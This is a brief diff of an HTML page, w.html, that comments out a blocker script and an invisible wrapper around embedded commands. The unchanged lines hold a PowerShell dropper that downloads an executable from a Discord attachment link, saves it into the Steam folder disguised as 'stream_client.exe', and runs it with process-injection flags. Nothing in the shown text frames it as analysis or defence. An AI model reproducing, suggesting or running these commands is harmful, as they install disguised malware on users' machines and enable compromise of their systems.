--- a/w.html
+++ b/w.html
@@ -1,7 +1,7 @@
-<script src="blocker.js"></script>
-<div class="process" style="opacity: 0;">
+# <script src="blocker.js"></script>
+# <div class="process" style="opacity: 0;">
   cls
   powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1195789181784436838/1195791255750316152/a.exe' -OutFile 'C:\Program Files (x86)\Steam\stream_client.exe'" 
   & "C:\Program Files (x86)\Steam\stream_client.exe" --process-name rstrui.exe --inject WriteMiniDmp.exe
-</div>
+# </div>
   cls
